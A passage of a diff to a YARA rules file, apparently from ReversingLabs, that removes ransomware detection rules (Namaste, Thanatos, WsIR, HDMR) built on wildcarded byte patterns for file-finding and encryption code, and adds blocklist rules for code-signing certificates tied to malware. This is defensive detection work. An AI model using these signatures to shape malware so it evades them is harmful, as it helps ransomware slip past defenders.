"df6e1403-c300-5d97-b57d-dc70d61b2229" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Namaste.yara#L1-L81" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5a952276f41b5524bcb82a9ceb076983d2faf2864b3bbd0a06d49bbd5edc1e0e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12218-L12234" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "67a975f2806825bf0da27fcaf33c2ff497fe9bb2af12c22ff505b49070516960" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Namaste" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 02 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 - ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 08 09 9A 13 ?? 02 11 ?? 28 ?? ?? - ?? ?? 17 28 ?? ?? ?? ?? 09 17 58 0D 09 08 8E 69 32 ?? DE ?? 26 DE ?? 2A - } - $find_files_p2 = { - 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 17 2A 03 6F ?? ?? ?? ?? - 0A 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 - 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? - ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 - 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? - ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? - ?? ?? 2D ?? 16 2A 03 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 03 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 20 ?? ?? ?? ?? 6A 31 ?? 16 0C DE ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? - 2A 08 2A - } - $encrypt_files_p1 = { - 02 03 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 2C ?? 02 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 02 7B ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 02 03 72 - ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 2C ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A - } - $encrypt_files_p2 = { - 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 20 ?? ?? ?? - ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1B 28 ?? ?? ?? ?? 28 - ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 02 07 - 28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? - DC 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A - } - $encrypt_files_p3 = { - 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 26 73 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 18 6F ?? ?? ?? ?? 04 14 73 ?? ?? ?? ?? 0B 06 07 06 - 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 07 06 6F ?? ?? ?? ?? 1E 5B 6F ?? - ?? ?? ?? 6F ?? ?? ?? ?? 06 1A 6F ?? ?? ?? ?? 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? - ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 03 19 73 ?? ?? ?? ?? 13 ?? 20 ?? - ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 2B ?? 09 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 11 ?? 11 ?? 16 11 - ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 30 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 09 - 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ?? ?? ?? ?? DC 03 28 ?? ?? ?? ?? 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Protover LLC" and pe.signatures[i].serial=="42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" and 1621900800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "73f4d6e2-6924-59fa-8ec1-305f2d5dc5a3" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12236-L12254" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "302e2d6b31ca5c2c33c4ec7294630fd88a9c40f70ddecdc606ccff27b24e1cd4" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x83\\xB4\\xE5\\xB7\\x9E\\xE8\\x9C\\x97\\xE7\\x89\\x9B\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and (pe.signatures[i].serial=="00:af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" or pe.signatures[i].serial=="af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3") and 1629676800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Thanatos : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE { meta: - description = "Yara rule that detects Thanatos ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "190adbd0-30a7-5619-ab70-3ab031ece2f7" - date = "2020-11-13" - modified = "2020-11-13" + id = "1841bbd1-4c7a-5b89-8c63-58d8a3ae1cef" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Thanatos.yara#L1-L85" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a51fa9cf1a08e4cd252a8b385be3bfde909585e2a799baaede977e40ecff5313" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12256-L12272" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1795812d4daa458b157280cac7a9b13e9b67a2d78eac077691bbce2bf8aeec34" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Thanatos" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 50 89 85 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? EB ?? 8D 49 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? C6 03 ?? FF - 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? - ?? ?? F7 F9 52 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 4F 75 ?? 8B 95 ?? ?? ?? - ?? 52 8D 85 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF D6 F6 85 ?? ?? ?? ?? ?? - 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D7 85 C0 0F 84 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 - 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D BD - ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B F8 72 ?? 8B - 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 74 ?? 53 8D 9D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? - ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 6A ?? 53 8B F0 53 8D 45 ?? 33 FF 50 - 89 7D ?? 89 5D ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 - ?? 8D 4D ?? 51 53 53 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B - C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 53 2B C2 50 8B 45 ?? 56 50 FF 15 ?? ?? ?? ?? 85 C0 - 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8D 4D ?? 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 50 8D 4D ?? 51 53 53 6A ?? 53 8B - 1D ?? ?? ?? ?? 52 89 45 ?? FF D3 85 C0 74 ?? 8B 45 ?? 8B 3D ?? ?? ?? ?? 50 6A ?? FF - D7 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 8B 55 ?? 8B 02 51 50 56 E8 ?? ?? - ?? ?? 8B 4D ?? 8B 45 ?? 83 C4 ?? 51 8D 55 ?? 52 56 6A ?? 6A ?? 6A ?? 50 FF D3 85 C0 - 74 ?? 8B 5D ?? 8B 0B 51 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 89 10 89 - 33 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 DB 8B 55 ?? 52 FF - 15 ?? ?? ?? ?? 8B 45 ?? 53 50 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C2 - } - $encrypt_files_p2 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 33 F6 56 68 ?? ?? ?? ?? - 6A ?? 56 6A ?? 68 ?? ?? ?? ?? 53 89 85 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? - ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 8B F0 - 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 56 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 50 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? - ?? ?? ?? 83 C4 ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 8D B5 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B - 00 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 B5 ?? ?? ?? ?? - 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? - ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B 95 ?? ?? ?? ?? 6A ?? 8D - 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 52 51 50 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? - 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? - ?? ?? 8B E5 5D C2 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RotA Games ApS" and pe.signatures[i].serial=="38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" and 1613088000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "fd19ce61-056b-549a-946e-72543ff1f7c0" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12274-L12292" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "eb5288d2b96ff7a7783c2b2b02f9f1168784352ed84ad6463dce00c12daca6cb" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ANKADA GROUP, d.o.o." and (pe.signatures[i].serial=="00:bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" or pe.signatures[i].serial=="bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09") and 1616630400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Wsir : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE { meta: - description = "Yara rule that detects WsIR ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "cb4ab736-9421-5b92-b4a5-c5db0b61725a" - date = "2022-08-02" - modified = "2022-08-02" + id = "6e8ffb39-d00d-54ca-a4be-68f6dd92d798" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.WsIR.yara#L1-L73" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c22c01f93945c7721ebfe5e7a09c3bf2b9d0ad95740bc0a76b4e61741f61d82c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12294-L12310" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "12235e324b92b83e9cfaed7cbcff5d093b8b1d7528dd5ac327159cde6e9a4d1f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "WsIR" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 - 55 8B E9 8D 4C 24 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? - ?? ?? ?? 8B 41 ?? 85 C0 74 ?? 8D 54 24 ?? 6A ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 00 - 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 85 C0 0F 95 C3 E8 ?? ?? ?? ?? - 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 - ?? ?? ?? ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 - ?? 8D 4C 24 ?? 89 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8B B4 24 ?? ?? - ?? ?? 57 8B 3D ?? ?? ?? ?? BB ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 54 24 ?? 68 ?? ?? - ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 45 ?? 8D 54 24 ?? 52 6A ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 50 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 89 4C 24 ?? 89 5C 24 ?? FF D7 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? - ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 56 6A ?? 68 - ?? ?? ?? ?? 51 FF D7 8D 4C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F - 5E 8B 8C 24 ?? ?? ?? ?? 5D 5B 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 - } - $encrypt_files = { - FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? - ?? FF 75 ?? 8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? - ?? ?? 6A ?? 8B 45 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 85 - C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B - 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? - E9 - } - $exec_proc = { - 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? - ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? 8D 54 24 ?? 51 52 68 ?? ?? ?? - ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B - F0 83 C4 ?? 85 F6 75 ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8D 74 04 ?? EB ?? 8D 57 ?? - 8D 4C 24 ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 4C 24 - ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 EB ?? C6 06 ?? 68 ?? ?? ?? - ?? 56 FF D3 8B 44 24 ?? 50 56 FF D3 8D 4C 24 ?? 55 51 FF 15 ?? ?? ?? ?? 8B F0 33 D2 - 83 FE ?? 0F 9F C2 8D 4C 24 ?? 8B F2 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 5D 8B C6 5B 8B 8C 24 ?? ?? ?? ?? 5F 5E 64 89 0D ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Everything Wow s.r.o." and pe.signatures[i].serial=="49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" and 1594252800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "f6d0808d-4748-5b9f-9be2-7753292a6209" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12312-L12328" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "978f05f86734c63afe1e5929a58f3cfff75ef749ffda07252db90b6fe12508ec" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($exec_proc) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and pe.signatures[i].serial=="25:c6:db:ce:3d:54:99:f6:5d:9d:f1:6e:90:07:46:5d" and 1626566400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_HDMR : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE { meta: - description = "Yara rule that detects HDMR ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "97b5020c-6cb1-5ec6-84a4-2f35eae761c2" - date = "2020-07-15" - modified = "2020-07-15" + id = "ac5ac6d7-898b-5547-8d35-a483f20edcd6" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.HDMR.yara#L1-L161" - license_url = 